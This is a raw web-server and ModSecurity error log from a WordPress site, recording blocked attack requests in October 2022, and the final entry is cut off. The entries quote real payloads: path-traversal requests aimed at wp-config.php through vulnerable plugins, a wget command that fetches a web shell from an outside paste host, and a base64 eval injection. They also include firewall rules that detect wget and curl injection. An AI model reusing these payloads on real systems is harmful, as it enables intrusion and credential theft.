/home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Oct 16 00:09:10.906473 2022] [autoindex:error] [pid 24436:tid 140003703183104] [client 143.198.51.182:36684] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php?673435=1 [Sun Oct 16 09:57:18.012677 2022] [:error] [pid 28201:tid 140091458299648] [client 64.90.48.104:46034] [client 64.90.48.104] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y0wbzjx8oj5fHWC7jJiBcwAAAMQ"] [Mon Oct 17 09:22:40.963046 2022] [:error] [pid 28697:tid 140552502720256] [client 5.188.62.76:44362] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y01lMAD_0vVEIlv07fnt8gAAAMw"] [Mon Oct 17 16:21:08.955283 2022] [:error] [pid 28049:tid 140552553076480] [client 51.132.190.85:55524] [client 51.132.190.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y03HRGMkFFNUNUjwj7xu1AAAAEY"], referer: www.google.com [Mon Oct 17 16:21:10.957816 2022] [:error] [pid 28697:tid 140552561469184] [client 51.132.190.85:55530] [client 51.132.190.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y03HRgD_0vVEIlv07fnzEwAAAMU"], referer: www.google.com [Mon Oct 17 16:31:24.359507 2022] [:error] [pid 28050:tid 140552469149440] [client 51.132.190.85:55876] [client 51.132.190.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y03JrC-9-x4-EREzVZa9CQAAAJA"], referer: www.google.com [Mon Oct 17 16:31:26.245684 2022] [:error] [pid 28048:tid 140552477542144] [client 51.132.190.85:55878] [client 51.132.190.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y03JrgiPsSNEXTsVVQXcTgAAAA8"], referer: www.google.com [Mon Oct 17 16:32:37.468935 2022] [:error] [pid 28697:tid 140552603432704] [client 51.132.190.85:55970] [client 51.132.190.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y03J9QD_0vVEIlv07fnzVAAAAMA"], referer: www.google.com [Mon Oct 17 16:32:39.517054 2022] [:error] [pid 28049:tid 140552603432704] [client 51.132.190.85:55972] [client 51.132.190.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y03J92MkFFNUNUjwj7xu8gAAAEA"], referer: www.google.com [Mon Oct 17 17:21:41.256185 2022] [autoindex:error] [pid 28697:tid 140552595040000] [client 141.95.104.232:57266] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 18 14:44:37.141990 2022] [:error] [pid 14408:tid 140609150994176] [client 173.252.95.9:51980] [client 173.252.95.9] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y08CJRsJiNkLe91E6eccLAAAAIs"] 2022/10/18 23:56:42 [error] 14280#14280: *48976 access forbidden by rule, client: 152.89.196.84, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Wed Oct 19 13:13:47.834030 2022] [autoindex:error] [pid 13496:tid 139650232436480] [client 159.65.183.159:38706] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Oct 19 20:12:19.168588 2022] [:error] [pid 13496:tid 139650224043776] [client 3.110.63.182:51402] [client 3.110.63.182] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y1Cgc2X2hne5en-9Cd2vEwAAANI"] [Wed Oct 19 20:13:10.926211 2022] [:error] [pid 12890:tid 139650430535424] [client 3.110.63.182:51546] [client 3.110.63.182] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y1Cgpl4can3TKjCP8mrl-QAAAEI"] [Wed Oct 19 21:10:38.941546 2022] [:error] [pid 13496:tid 139650215651072] [client 45.55.231.37:56142] [client 45.55.231.37] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y1CuHmX2hne5en-9Cd2xhwAAANM"] 2022/10/20 03:23:49 [error] 12755#12755: *76486 access forbidden by rule, client: 35.176.62.186, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/10/20 03:23:53 [error] 12755#12755: *76494 access forbidden by rule, client: 35.176.62.186, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/20 03:24:00 [error] 12755#12755: *76506 access forbidden by rule, client: 35.176.62.186, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Oct 20 12:47:48.020376 2022] [:error] [pid 25624:tid 139945075181312] [client 128.199.124.66:55050] [client 128.199.124.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_BODY. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_BODY: action=arf_delete_file&file_name=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y1GJxAtXMBZarAjjwdvA-wAAAJg"] [Thu Oct 20 13:01:18.276455 2022] [:error] [pid 26227:tid 139945091966720] [client 128.199.124.66:55648] [client 128.199.124.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y1GM7nFw1p4wtugOvH1A0QAAANY"] [Thu Oct 20 13:19:20.167807 2022] [:error] [pid 25624:tid 139945251428096] [client 128.199.124.66:57386] [client 128.199.124.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y1GRKAtXMBZarAjjwdvBagAAAIM"] [Thu Oct 20 13:20:19.348919 2022] [:error] [pid 25622:tid 139945091966720] [client 128.199.124.66:57458] [client 128.199.124.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(fromcharcode|alert|eval)\\\\s*\\\\(" at ARGS:items_per_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "391"] [id "973307"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: eval( found within ARGS:items_per_page: ${@eval(base64_decode(cgfzc3rocnuoj2nkihdwlwnvbnrlbnqvdxbsb2fkcy8ymde4lzaxo3dnzxqgahr0cdovl3d3dy5hd3rjlmfpzhquzwr1ly9jb21wb25lbnrzl2nvbv9immpjb250ywn0l3vwbg9hzhmvdhh0lnr4ddttdib0ehqudhh0igl6b20ucghwjyk7))}"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/produits/"] [unique_id "Y1GRY9JNqzuz6tm4COQf0QAAABY"] [Thu Oct 20 13:30:15.433865 2022] [:error] [pid 25624:tid 139945243035392] [client 128.199.124.66:58202] [client 128.199.124.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/application/configs/application.ini"] [unique_id "Y1GTtwtXMBZarAjjwdvBmwAAAIQ"] 2022/10/22 03:59:20 [error] 24037#24037: *124366 access forbidden by rule, client: 18.116.31.243, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Oct 22 13:06:14.800968 2022] [:error] [pid 24395:tid 140056621639424] [client 5.188.62.76:38254] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y1QxFj2A2fpYciEzwgvBhwAAAMU"] 2022/10/22 19:49:52 [error] 24037#24037: *136090 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/alfacgiapi" failed (2: No such file or directory), client: 137.184.59.72, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/alfacgiapi HTTP/1.1", host: "investigacionperu.com" 2022/10/22 19:49:55 [error] 24036#24036: *136099 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/ALFA_DATA/alfacgiapi" failed (2: No such file or directory), client: 137.184.59.72, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ALFA_DATA/alfacgiapi HTTP/1.1", host: "investigacionperu.com" 2022/10/22 19:50:00 [error] 24037#24037: *136107 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/alfacgiapi" failed (2: No such file or directory), client: 137.184.59.72, server: investigacionperu.com, request: "GET /.well-known/pki-validation/alfacgiapi HTTP/1.1", host: "investigacionperu.com" 2022/10/22 19:50:05 [error] 24036#24036: *136114 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/ALFA_DATA/alfacgiapi" failed (2: No such file or directory), client: 137.184.59.72, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ALFA_DATA/alfacgiapi HTTP/1.1", host: "investigacionperu.com" [Sat Oct 22 19:53:37.455429 2022] [authz_core:error] [pid 24172:tid 140056638424832] [client 137.184.59.72:48570] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/admin.php [Mon Oct 24 15:41:10.390440 2022] [autoindex:error] [pid 24445:tid 140185350158080] [client 20.63.139.126:43194] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 24 15:41:10.938315 2022] [autoindex:error] [pid 23851:tid 140185291409152] [client 20.63.139.126:43196] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/10/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2022/10/24 21:47:19 [error] 23815#23815: *185178 access forbidden by rule, client: 184.73.5.45, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Oct 26 14:17:37.163968 2022] [:error] [pid 2733:tid 140358540699392] [client 159.69.21.14:43540] [client 159.69.21.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y1mH0QkK-VOud3993CtcvAAAAAU"], referer: https://www.google.com [Wed Oct 26 14:17:53.899442 2022] [:error] [pid 2821:tid 140358381954816] [client 159.69.21.14:43542] [client 159.69.21.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match 